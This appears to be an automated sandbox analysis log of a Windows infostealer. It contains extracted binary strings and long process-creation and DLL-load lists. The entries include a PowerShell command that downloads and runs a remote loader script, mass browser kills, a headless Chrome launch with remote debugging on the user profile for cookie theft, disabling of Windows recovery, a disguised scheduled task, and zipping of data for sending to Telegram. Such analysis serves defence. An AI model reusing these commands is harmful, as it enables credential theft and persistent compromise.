linksInitializeProcThreadAttributeList142108547152020037174224853515625710542735760100185871124267578125reflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of range to pointer to array with length sync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangego package net: confVal.netCgo = skip everything and stop the walkempty hex number for chunk leng
Source: SplpM1fFkV.exeString found in binary or memory: failed to construct HKDF label: %stoo many references: cannot spliceSetFileCompletionNotificationModes3552713678800500929355621337890625reflect: Field of non-struct type reflect: Field index out of boundsreflect: string index out of rangeslice bounds out of range [:%x:%y]slice bounds out of range [%x:%y:]out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inconsistent bp entersyscallblock inconsistent sp runtime: g is running but p is notinvalid timer channel: no capacity: day-of-year does not match monthunexpected runtime.netpoll error: crypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizeSending the zip file to Telegram...unexpected output from wmic commandform-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharenetwork dropped connection on resettransport endpoint is not connected1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9reflect.MakeSlice of non-slice typepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=mime: invalid RFC 2047 encoded-wordmime: bogus characters after %%: %qno such multicast network interfacehpack: invalid Huffman-encoded datadynamic table size update too largefile type does not support deadlinex509: decryption password incorrectx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state size'_' must separate successive digitstoo many Questions to pack (>65535)flate: corrupt input before offset bigmod: modulus is smaller than natP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at
Source: SplpM1fFkV.exeString found in binary or memory: failed to construct HKDF label: %stoo many references: cannot spliceSetFileCompletionNotificationModes3552713678800500929355621337890625reflect: Field of non-struct type reflect: Field index out of boundsreflect: string index out of rangeslice bounds out of range [:%x:%y]slice bounds out of range [%x:%y:]out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inconsistent bp entersyscallblock inconsistent sp runtime: g is running but p is notinvalid timer channel: no capacity: day-of-year does not match monthunexpected runtime.netpoll error: crypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizeSending the zip file to Telegram...unexpected output from wmic commandform-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharenetwork dropped connection on resettransport endpoint is not connected1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9reflect.MakeSlice of non-slice typepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=mime: invalid RFC 2047 encoded-wordmime: bogus characters after %%: %qno such multicast network interfacehpack: invalid Huffman-encoded datadynamic table size update too largefile type does not support deadlinex509: decryption password incorrectx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state size'_' must separate successive digitstoo many Questions to pack (>65535)flate: corrupt input before offset bigmod: modulus is smaller than natP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at
Source: SplpM1fFkV.exeString found in binary or memory: net/addrselect.go
Source: unknownProcess created: C:\Users\user\Desktop\SplpM1fFkV.exe "C:\Users\user\Desktop\SplpM1fFkV.exe"
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ReAgentc.exe reagentc.exe /disable
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command $env:USERNAME
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Compress-Archive -Path \"C:\Users\user\AppData\Local\Temp\user\" -DestinationPath \"C:\Users\user\AppData\Local\Temp\user.zip\" -Force"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get caption
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic NIC get MACAddress
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex"Jump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command $env:USERNAMEJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Compress-Archive -Path \"C:\Users\user\AppData\Local\Temp\user\" -DestinationPath \"C:\Users\user\AppData\Local\Temp\user.zip\" -Force"Jump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get captionJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic NIC get MACAddressJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ReAgentc.exe reagentc.exe /disableJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHESTJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: reagent.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: wdscore.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: fveapi.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: fveapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
